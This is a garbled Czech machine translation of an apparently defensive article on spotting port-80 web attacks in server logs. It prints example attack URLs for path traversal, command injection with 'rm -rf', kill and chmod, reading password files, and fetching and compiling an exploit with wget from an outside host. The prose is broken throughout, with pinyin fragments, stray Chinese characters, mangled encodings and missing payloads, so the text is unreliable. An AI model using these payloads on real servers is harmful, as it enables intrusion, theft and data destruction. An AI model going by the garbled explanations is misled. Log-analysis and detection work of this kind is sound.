I. Shrnutí
II. Podrobný popis
III. Další
IV. Přelévání analýza
V. Převod kódování
VI. Závěr
[Abstract]
Webové stránky pro službu port 80 by výchozím nastavení i některé z těchto Slabá místa Vše bezpečnostní otázky neustálého vyjela, be zneužít k získání přístupu k systému to místo administrator's Quanxian Neibu, following Zenomorph 80 útok Duankou na některé z stop na Fang Shi výzkumu, a říct, jak nahrávat z log najít problémy.
[Detail]
Zde v části přes počet zobrazení Liezi na webových serverů a aplikací na jejich obecné útoku, a její stopy, které Liezi představují pouze hlavní útok, neexistuje seznam všech formy útoku, bude této sekci podrobný popis role každého útoku, a jeho, jak tyto chyby zneužít k útoku.
(1) "." ".." A "..." dotaz
Stopy těchto útoků jsou velmi běžné pro webové aplikace a webový server, který slouží k dovolit útočníkovi nebo červ-počítačový virus plán změnit webový server na cestu, získat přístup do uzavřených oblastí. Většina CGI programů s těmito nedostatky, ".." dotaz.
Příklad:
http://host/cgi-bin/lame.cgi?file=../../../../etc/motd
To ukazuje, útočník Liezi žádost mosd tento soubor, v případě, že útočník schopnost průlom web server kořenovém adresáři, pak dostanete více informací a získání dalších výhod.
(2) "% 20" žádost
% 20 je hex hodnota, že 16 míst, i když to neznamená, že můžete použít cokoliv, ale při zobrazení log najde to, že některé webové serverové aplikace běžící na tento znak může být účinně prováděna Proto byste měli pečlivě přezkoumat log. Na druhou stranu, může požádat někdy pomůže provádět některé příkazy.
Příklad:
http://host/cgi-bin/lame.cgi?page=ls% 20-al |
Tento Liezi ukazuje útočník spustit příkazové, seznam celého katalogu požadovaných dokumentů, působit útočník přístup k vašim důležitých systémových souborů, aby mu pomohl k dalšímu zajistit podmínky pro získání oprávnění.
(3) "% 00" žádost
% 00 řekl, že 16-byte hexadecimální prázdný, on byl schopný oklamat webové aplikace, a požádat o jiné typy souborů.
Příklady:
http://host/cgi-bin/lame.cgi?page=index.html
To může být platný požadavek na stroji, je-li útočník si vědom tato žádost byla úspěšná, bude se dále hledat cgi postupy.
http://host/cgi-bin/lame.cgi?page=../../../../etc/motd
Možná cgi program nepřijme tuto žádost, protože to je požadavek na kontrolu názvu souboru příponu, například: html.shtml nebo jiné typy souborů. Většina programů bude vám požadovaný typ souboru je neplatný, tentokrát to bude vyprávět útočník požaduje soubor musí být znak na typu souboru příponu, so jeden útočník can get systému cesta, název souboru, resulting in Váš systém více citlivé informace
http://host/cgi-bin/lame.cgi?page=../../../../etc/motd% 00html
Pozornost k této žádosti, bude podvádět CGI program, že tento dokument je stanovit přijatelnou typy souborů, některé aplikace účinných kontrol, jak hloupý dotaz souboru, který je běžně používané metody útočník.
(4) "|" Žádost
Jedná se o potrubí charakter, v unixový systém, žádost o pomoc při realizaci několika systémových příkazů najednou.
Příklad:
# Cat access_log | grep-i ".."
(Tento příkaz zobrazí log v ".." dotaz, běžně používané v útocích a červi nalezených)
Často zjistíte, že mnohé webové aplikace využívají tento znak, to také vede k falešným poplachům v IDS protokolů.
V pečlivém přezkoumání Vaší žádosti, takže výhoda snížení falešných poplachů v systému detekce průniku.
Zde jsou některé z Lieh-tzu:
http://host/cgi-bin/lame.cgi?page=../../../../bin/ls |
Tato žádost příkaz, Níže jsou uvedeny některé změny v Liezi
http://host/cgi-bin/lame.cgi?page=../../../../bin/ls% 20-al% 20/etc |
Tento požadavek je uveden v systému Unix / etc adresář všech souborů
http://host/cgi-bin/lame.cgi?page=cat% 20access_log | grep% 20-i% 20 "lame"
Kočka příkazů žádosti a realizaci příkazu grep také, podívejte se na "lame"
(5) "," Žádost
V unix systémy, tento znak umožňuje více příkazů na jeden řádek provádění
Příklad:
# Id, uname-a
(Implementace id příkazu, následuje provedení příkazu uname)
Některé webové program na tento znak, může mít za následek vaše IDS Záznamy varování selhání, měli byste pečlivě zkontrolovat web program, takže můžete snížit riziko selhání záznamů IDS.
(6) " " a " " Žádost
By měla zkontrolovat logy zaznamenávají dva znaky, z mnoha důvodů, z nichž první je znak, že přidaná data v dokumentu
Příklad 1:
# Echo "Vaše hax0red h0 h0" / etc / motd (motd žádost písemné informace v tomto dokumentu)
Útočník může jednoduše využívat dotaz jak je uvedeno výše manipulace s vaší webové stránky. Jako slavný RDS zneužít útočník se často používá ke změně webové stránky.
Příklad 2:
http://host/something.php=Hi% 20mom% 20Im% 20Bold!
Html Všimněte si, že řeč symbolů tady, i on strávil " "," " znaky, jako jsou útoky nemohou způsobit útočníkovi přístup k systému, zmatených lidí, že to je legitimní Informace o webu (vedoucí k Lidé navštivte tuto stránku navštívit útočník nastavit adresu, může být tato žádost zakódovány do 16 hex znaků ve formě, takže stopy po útoku není tak nápadná)
(7) "!" Žádost
Společný jazyk na tento znak žádost SS (Server Side include) I útok, je-li útočník útočník zmást uživatel klepne na odkaz set, a stejně jako výše.
Příklad:
http://host1/something.php =
Lieh-tzu je útočník, může to udělat do souboru na webu host2 z host1 objeví nahoře (samozřejmě vyžadují návštěvníci navštívit útočníka nastavení připojení. Tato žádost se může přeměnit 16 hex kódování maska, není snadné najít)
Zároveň lze tento přístup rovněž příkazem orgánu webové stránky
Příklad:
http://host/something.php =
Lieh-běží na vzdáleném systému "id" příkazu, zobrazí webové stránky ID uživatele, je obvykle "nobody" nebo "www"
Tento formulář umožňuje také součástí skryté soubory.
Příklad:
http://host/something.php =
Skryté soubory. Htpasswd nebude zobrazena, bude Apache odmítnout vytvořit pravidla pro. Ht formulář žádosti, a SSI logo bude obejít tato omezení, a vést k bezpečnostním problémům
(8) "," Žádost
Yong Yu pokusil napadnout vzdálený webová aplikace pro vložení PHP program, který může dovolit spouštět příkazy, záleží na nastavení serveru, a jiná díla faktorů (Biru php nastavit nouzovém režimu)
Příklad: http://host/something.php = passthru ("id ");?
V některých jednoduchých PHP aplikace, může být na internetových stránkách na vzdálený systém práv uživatele k provedení místního velení
(9) "" "Žádost
Tento znak později použít k spouštět příkazy v jazyce Perl, znaky webové aplikace není často, takže pokud ho vidíte ve svém deníku, by měli být opatrní
Příklad:
http://host/something.cgi = `id`
Napište perl CGI program v otázce vedlo k realizaci příkazu id
[Další]
V následující části se bude diskutovat o zavedení více útoků by mohla kontrolovat, spolu s požadovanou dokumentaci, a pokud budete mít vzdálený příkazů chybu, mělo by být, jak kontrolovat objevu. Tato část je pouze dát vám dobrý nápad, a systém vám řekne, co se stalo, útočník pokusit zaútočit na váš systém stop, ale nemůže vypsat všechny útočník použití příkazů a žádostí.
"/ Bin / ls"
Tento příkaz požaduje celou cestu, v mnoha webových aplikací tuto mezeru, pokud se přihlásíte na mnoha místech takové žádosti, je možné, aby velké vzdálené spuštění příkazu chybu, ale ne nutně problém může být také falešný poplach. Opět připomněla, web písemné žádosti (CGI, ASP, PHP ... atd.) je základem bezpečnosti
Příklad:
http://host/cgi-bin/bad.cgi?doh=../../../../bin/ls% 20-al |
http://host/cgi-bin/bad.cgi?doh=ls% 20-al;
"Cmd.exe"
To je ano okna shellu, je-li útočník přístup a spuštění tohoto skriptu může Nastavení serveru 允许 podmínek na Windows stroji udělat cokoliv, mnoho červů, virů Jiu Shi 通过 port 80, komunikace Dao Yuan Cheng je stroj
http://host/scripts/something.asp=../../WINNT/system32/cmd.exe?dir+e:
"/ Bin / id"
Jedná se o dva binární soubory, jeho problémy a / bin / ls, jako, když se přihlásíte na mnoha místech takové žádosti, je možné, aby velké vzdálené spuštění příkazu chybu, ale ne nutně problém může být také falešný poplach.
To ukáže, která část patří ke kterému uživatelů a skupin
Příklad:
http://host/cgi-bin/bad.cgi?doh=../../../../bin/id |
http://host/cgi-bin/bad.cgi?doh=id;
"/ Bin / rm"
Tento příkaz může mazat soubory, aniž by správné použití je velmi nebezpečné
Příklady:
http://host/cgi-bin/bad.cgi?doh=../../../../bin/rm% 20-rf% 20 * |
http://host/cgi-bin/bad.cgi?doh=rm% 20-rf% 20 *;
"Wget a TFTP" command
Tyto příkazy jsou často Útočník může získat další oprávnění pro stahování souborů, wget je unix velení pod, může být použit ke stažení backdoors, tftp je pod velením Unix a NT, se používá pro stažení souboru. Někteří IIS červy šířit se přes TFTP pro kopírování virus na ostatních počítačích
Příklady:
http://host/cgi-bin/bad.cgi?doh=../../../../path/to-wget/wget% 20http: / / host2/Phantasmp.c | http:// host / cgi-bin / bad.cgi? doh = wget% 20http: / / www.hwa-security.net/Phantasmp.c;
"Cat" command
Tento příkaz se používá k zobrazení obsahu souboru, který se používá ke čtení důležité informace, jako jsou konfigurační soubory, soubory heslo, kreditní soubory a dokumenty si můžete myslet
Příklady: http://host/cgi-bin/bad.cgi?doh=../../../../bin/cat% 20/etc/motd | http://host/cgi-bin/ bad.cgi? doh = kočka% 20/etc/motd;
"Echo" command
Tento příkaz slouží k zápisu dat do souboru, například "index.html"
Příklady: http://host/cgi-bin/bad.cgi?doh=../../../../bin/echo% 20 "fc-# kiwi% 20was% 20here"% 20 |% 200day.txt http://host/cgi-bin/bad.cgi?doh=echo% 20 "fc-# kiwi% 20was% 20here"% 20 % 200day.txt;
"Ps" command
Seznamy v současné době běží proces, řekni, že útočník vzdáleném počítači běží software, aby bylo možné získat představu o bezpečnostních otázkách, získat další povolení
Příklady: http://host/cgi-bin/bad.cgi?doh=../../../../bin/ps% 20-aux | http://host/cgi-bin/bad. cgi? doh = ps% 20-aux;
"Kill a killall" command
Unix systémy, aby se zabít tohoto procesu, útočník může využít tento příkaz k zastavení the systémové služby a procesy mohou also vymazat stopy of útočník, někteří zneužít will produkují mnoho child procesů
Příklady: http://host/cgi-bin/bad.cgi?doh=../bin/kill% 20-9% 200 | http://host/cgi-bin/bad.cgi?doh=kill% 20 -9% 200;
"Uname" command
Tento příkaz říká útočník vzdáleném stroji jméno, za nějaký čas, a to prostřednictvím této webové stránky, aby bylo vědět, které ISP, útočník, který je možno navštívit i dnes. Uname-a požádat normálně, budou zaznamenány do log souboru
Příklady: http://host/cgi-bin/bad.cgi?doh=../../../../bin/uname% 20-a | http://host/cgi-bin/bad. cgi? doh = uname% 20-a;
"Cc, gcc, perl, python, etc ..." kompilace / Výklad příkazu
Útočník přes wget, nebo tftp download využít, a použití cc, gcc kompilátoru pro kompilaci tohoto do spustitelného programu, a další přístupová oprávnění
Příklady: http://host/cgi-bin/bad.cgi?doh=../../../../bin/cc% 20Phantasmp.c | http://host/cgi-bin/bad. cgi? doh = gcc% 20Phantasmp.c;. / a.out% 20-p% 2031337;
Pokud jste zobrazení protokolu našel "perl" python "Tyto instrukce mohou stáhnout vzdálený útočník Perl, Python skript, a snažil se dostat výsady místních
"Pošta" Příkaz
Útočníci často používají tento příkaz systému, některé důležité dokumenty, na útočníkův vlastní poštovní schránku, ale také ochotné e-mail bombové útoky jsou prováděny
Příklady: http://host/cgi-bin/bad.cgi?doh=../../../../bin/mail% 20attacker@fuckcnhonker.org% 20
2.168.22.1;
"Chown, chmod, chgrp, chsh, etc ..." a další příkazy
Unixové systémy s cílem umožnit jim změnit oprávnění k souborům
chown = umožňuje nastavit vlastníka souboru chmod = umožňuje nastavit oprávnění k souborům chgrp = umožňuje vlastníkovi změnit skupině oprávnění pro soubory chsh = dovoleno měnit uživatele shell
Příklady: http://host/cgi-bin/bad.cgi?doh=../../../../bin/chmod% 20777% 20index.html | http://host/cgi-bin/ bad.cgi? doh = chmod% 20777% 20index.html; http://host/cgi-bin/bad.cgi?doh=../../../../bin/chown% 20zeno% 20 / etc / master.passwd | http://host/cgi-bin/bad.cgi?doh=chsh% 20/bin/sh; http://host/cgi-bin/bad.cgi?doh=../. . / .. / .. / bin / chgrp% 20nobody% 20/etc/shadow |
"/ Etc / passwd" soubor
To je systém, heslo souboru, obvykle stín off, a neumožňuje vidět šifrované heslo, ale útočník, který nemůže vědět, co je platné uživatelské, a systém je absolutní cesta, místo jména a další informace, jak je obvykle stínem off, takže útočník bude normálně vidět / etc / shadow soubor
"/ Etc / master.passwd"
Tento soubor je systém BSD heslo soubor, obsahující zašifrované heslo, soubor na účet root jen Read-Only, a některé nekvalifikované útočníkům otevřel jeho pokus s cílem přečíst obsah uvnitř., Pokud jsou webové stránky root oprávnění ke spuštění, pak útočník je, můžeme číst obsah uvnitř, hodně problémů na správce systému přijde jedna po druhé
"/ Etc / shadow"
Obsahuje heslo zašifrované systémem, přečtěte si stejný na root účet, a / et / master.passwd téměř
"/ Etc / motd"
Když uživatelé přihlásit do systému Unix Zhong informace se objeví v "zprávu dne" soubor, a poskytuje důležité informace o systému, a správci Yonghu některá nastavení Naxie chcete uživatelům vidět nejsou, obsahuje rovněž verze systému informace, útočník obvykle vidět tento soubor, pochopit, co je systém běží na útočníka, je dalším krokem k hledání tohoto typu systému, využívat, a dále přístup do systému oprávnění
"/ Etc / hosts"
Tento dokument obsahuje IP adresu a informace o síti, útočník může dozvědět více o systému, nastavení sítě
"/ Usr / local / apache / conf / httpd.conf"
Jedná se o webový server Apache Konfigurační soubor může útočník chápat, jako je CGI, SSI a další informace jsou přístupné
"/ Etc / inetd.conf"
Toto je konfigurační soubor inetd služby, útočník může dozvědět vzdáleném stroji, start těchto služeb, zda použít wrapper pro řízení přístupu, je-li obálka bylo zjištěno, běh, útočník Dalším krokem bude kontrolovat "/ etc / hosts.allow" a "/ etc / hosts.deny", soubor, a které se mohou měnit některá nastavení, přístupová oprávnění
". Htpasswd,. Htaccess, a. Htgroup"
Tyto soubory se obvykle používají v uživatelské ověřování webových serverů, by útočník prohlížení těchto souborů, a získat uživatelské jméno a heslo, je heslo soubor. Htpasswd zašifrované, prorazit nějaký jednoduchý proces dešifrování, umožnit útočníkovi získat přístup na stránky chráněných území (obvykle uživatel se stejným uživatelským jménem a heslem, může útočník dokonce navštívit jiný účet)
"Accessjog a error_log"
Jedná se o apache server soubory protokolu, útočníky často prohlížení těchto souborů, podívejte se na tyto žádosti jsou zaznamenávány, ty a další žádosti o různých místech
Typicky, útočník změně těchto log soubory, jako jsou jeho vlastní adrese, útočník přes port 80 přes váš systém a vaše záložní systém také nefunguje, neexistuje žádný jiný záznam program záznam o stavu systému, který by detekce narušení bezpečnosti se stává velmi obtížné pracovat
"[Jednotka-dopisu]: winntrepairsam._ nebo [drive-dopisu]: winntrepairsam"
Windows NT systému heslem souborů, v případě, že vzdálený příkaz nemůže být realizován, budou útočníci obvykle požadují tyto dokumenty, pak "l0pht crack", o typu nástroje na prolomení hesla na crack, pokud se útočník pokusí zaútočit na heslo správce souborů, pokud vzdáleném počítači bude úspěšný, pokud útočník získá kontrolu
[Přetečení analýza]
V tomto článku se nebudu říkat příliš mnoho o přetečení téma, dám to, co tyto jevy a stopy pozoruhodné a zvláštní obavy, buffer je často napadána, útočník, který transkódování a těžko najít jiné způsoby, jak dosáhnout
Zde je jednoduchý Lež Zi
Příklad: http://host/cgi-bin/helloworld?type=AAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AA
Tento Liezi ukazuje útočník na žádost poslat mnoho znaků, testovat program buffer overflow, can buffer overflow získat vzdálené příkazové oprávnění spuštění hostitele, pokud majitel setuid a postupy pro root, přes přepad, Můžete získat přístup k celému systému, ne-li setuid program líbí, pak přetečení je pouze běží na internetových stránkách být uživatelská práva
Tady nemůže říct všech okolností, ale měli byste pravidelně kontrolovat svůj log souboru, pokud to den najednou našel spoustu žádostí, ale obvykle ne více než požadavek, to znamená, že jsou vystaveny útokům přetečení, samozřejmě, může být také nová síť worm útoků
[Převod kódování]
Všechny útoky výše uvedené žádosti, útočník obvykle ví, IDS systémy často mechanická kontrola dotaz, obvykle útočník bude používat data konverzní nástroj pro převod požadované obsah ve formátu 16 pásmu, což vede k IDS bude ignorovat tyto žádosti, Jsme obeznámeni s zranitelnost CGI skenovací nástroj, který je dobrý Liezi Whisker. Máte-li zobrazit protokol času našel velký počet 16-kapela a ne některé společné znaky, pak útočník může pokusit využít některé z možností, jak zaútočit na svůj systém
Rychlý způsob, jak zjistit, že váš soubor protokolu žádosti o těchto 16 hex, zkopírujte jej do vašeho prohlížeče, můžete prohlížeč převést právo požadovat, a zobrazí požadovaný obsah, pokud nechcete odvahu, aby toto riziko, jednoduchý člověk ASCII, vám může poskytnout správný kód.
[Závěr]
Tento článek nemůže pokrýt všechny 80 porty útoku, ale tyto byly citovány Liao nejčastější metody útoku, přičemž se vám, jak zkontrolovat log soubory a jak přidat Ru Yi Xie IDS pravidla, psaní její cílem je web správce systému by měl být o tom, co je dobrý nápad ve stejnou dobu, doufám, že tento článek pomůže k webovým vývojářům psát program web lepší program
OF POZNÁMKA: Pokud máte nějaké připomínky a návrhy, prosím pošlete e-mail admin@cgisecurity.com.